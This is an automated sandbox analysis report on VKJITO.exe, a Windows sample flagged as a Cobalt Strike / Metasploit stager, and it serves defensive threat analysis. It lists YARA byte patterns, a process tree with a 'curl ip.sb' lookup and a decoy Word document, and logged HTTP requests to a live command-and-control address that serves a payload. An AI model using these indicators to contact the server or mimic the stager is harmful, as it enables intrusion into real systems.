
Windows Analysis Report
VKJITO.exe

Overview

General Information

Sample name: VKJITO.exe
Analysis ID: 1577651
MD5: 34bfa047aaca8fd4dc99759ebf0e1a6a
SHA1: ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
SHA256: 517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
Tags: exe, user-smica83

Detection

CobaltStrike, Metasploit
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected landing page (webpage, office document or email)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VKJITO.exe (PID: 3056 cmdline: "C:\Users\user\Desktop\VKJITO.exe" MD5: 34BFA047AACA8FD4DC99759EBF0E1A6A)
    • curl.exe (PID: 4068 cmdline: "curl" ip.sb MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7092 cmdline: "cmd" /c start C:\Users\user\Desktop\???????.docx MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 4308 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • WerFault.exe (PID: 1656 cmdline: C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp
Rule: Windows_Trojan_Metasploit_7bc0f998
Description: Identifies the API address lookup function leverage by metasploit shellcode
Author: unknown
Strings:
  • 0x1900b:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61

Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp
Rule: Windows_Trojan_Metasploit_c9773203
Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Author: unknown
Strings:
  • 0x19077:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_MetasploitPayload_3
Description: Yara detected Metasploit Payload
Author: Joe Security

Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_CobaltStrike_3
Description: Yara detected CobaltStrike
Author: Joe Security

Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Metasploit_7bc0f998
Description: Identifies the API address lookup function leverage by metasploit shellcode
Author: unknown
Strings:
  • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61

Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Metasploit_c9773203
Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.
Author: unknown
Strings:
  • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_MetasploitPayload_3
Description: Yara detected Metasploit Payload
Author: Joe Security

        System Summary

        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 139.159.139.109, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\VKJITO.exe, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
        No Suricata rule has matched


        AV Detection

        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
        Source: VKJITO.exeReversingLabs: Detection: 42%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4342940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4349A10 BCryptGenRandom,0_2_00007FF7D4349A10

        Phishing

        Source: Screenshot id: 9Joe Sandbox AI: Screenshot id: 9 contains prominent button: 'download'
        Source: Screenshot id: 10Joe Sandbox AI: Screenshot id: 10 contains prominent button: 'download'
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: winword.exeMemory has grown: Private usage: 1MB later: 82MB

        Networking

        Source: Malware configuration extractorURLs: http://39.159.139.109:8080/uz68
        Source: Malware configuration extractorURLs: http://139.159.139.109/uz68
        Source: global trafficTCP traffic: 192.168.2.5:49707 -> 139.159.139.109:8080
Source: Joe Sandbox ViewIP Address: 104.26.12.31
Source: Joe Sandbox ViewASN Name: HWCSNETHuaweiCloudServicedatacenterCN
        Source: global trafficHTTP traffic detected: GET /uz68 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Host: 139.159.139.109:8080Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip.sbUser-Agent: curl/7.83.1Accept: */*
        Source: global trafficHTTP traffic detected: GET /uz68 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Host: 139.159.139.109:8080Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: ip.sb
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmp, VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68cex
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68fap
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68g
        Source: curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/
        Source: curl.exe, 00000001.00000002.2054270083.0000022B7B259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/00005
        Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net

        System Summary

        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4340E60 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7D4340E60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431CEC0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,0_2_00007FF7D431CEC0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4340D00 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7D4340D00
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43442F00_2_00007FF7D43442F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43429400_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431B5900_2_00007FF7D431B590
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43495300_2_00007FF7D4349530
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43125400_2_00007FF7D4312540
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43505B00_2_00007FF7D43505B0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43395C00_2_00007FF7D43395C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434E6700_2_00007FF7D434E670
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43166500_2_00007FF7D4316650
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43526A00_2_00007FF7D43526A0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43526D30_2_00007FF7D43526D3
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434F7200_2_00007FF7D434F720
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43218800_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43508800_2_00007FF7D4350880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432390F0_2_00007FF7D432390F
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43208B90_2_00007FF7D43208B9
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43421900_2_00007FF7D4342190
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43401200_2_00007FF7D4340120
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432E1E00_2_00007FF7D432E1E0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434E2000_2_00007FF7D434E200
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431F1C00_2_00007FF7D431F1C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434D1C00_2_00007FF7D434D1C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434D3300_2_00007FF7D434D330
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D431E3490_2_00007FF7D431E349
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43553E00_2_00007FF7D43553E0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D435D3D00_2_00007FF7D435D3D0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43594900_2_00007FF7D4359490
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434F4300_2_00007FF7D434F430
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43264400_2_00007FF7D4326440
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4350D800_2_00007FF7D4350D80
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4318D400_2_00007FF7D4318D40
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4314DF00_2_00007FF7D4314DF0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4327E600_2_00007FF7D4327E60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434EEE00_2_00007FF7D434EEE0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43520700_2_00007FF7D4352070
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434C0800_2_00007FF7D434C080
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432B0400_2_00007FF7D432B040
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434D0400_2_00007FF7D434D040
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43140F00_2_00007FF7D43140F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43500F00_2_00007FF7D43500F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432F9F00_2_00007FF7D432F9F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434F9D00_2_00007FF7D434F9D0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D432AA600_2_00007FF7D432AA60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4327A800_2_00007FF7D4327A80
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4353AE00_2_00007FF7D4353AE0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4350AB00_2_00007FF7D4350AB0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4341CD00_2_00007FF7D4341CD0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D434FCD00_2_00007FF7D434FCD0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF7D432A450 appears 73 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF7D4312AC0 appears 64 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF7D435C330 appears 47 times
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE76.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: classification engineClassification label: mal92.troj.winEXE@12/235@1/3
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D43208B9 memset,GetModuleHandleW,FormatMessageW,memmove,GetLastError,0_2_00007FF7D43208B9
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Users\user\Desktop\VKJITO.exeFile created: C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3008:120:WilError_03
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3056
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{E0D17D01-5636-4B1F-B917-5E8F8067BDEC} - OProcSessId.dat
        Source: VKJITO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\VKJITO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: VKJITO.exeReversingLabs: Detection: 42%
        Source: unknownProcess created: C:\Users\user\Desktop\VKJITO.exe "C:\Users\user\Desktop\VKJITO.exe"
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3056 -s 1076
Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sb
Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: wininet.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: iertutil.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: winhttp.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: winnsi.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: urlmon.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: netutils.dll
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp140.dll
Source: C:\Windows\System32\cmd.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
Source: C:\Users\user\Desktop\VKJITO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: ???????.LNK.6.drLNK file: ..\..\..\..\..\Desktop\.docx
        Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
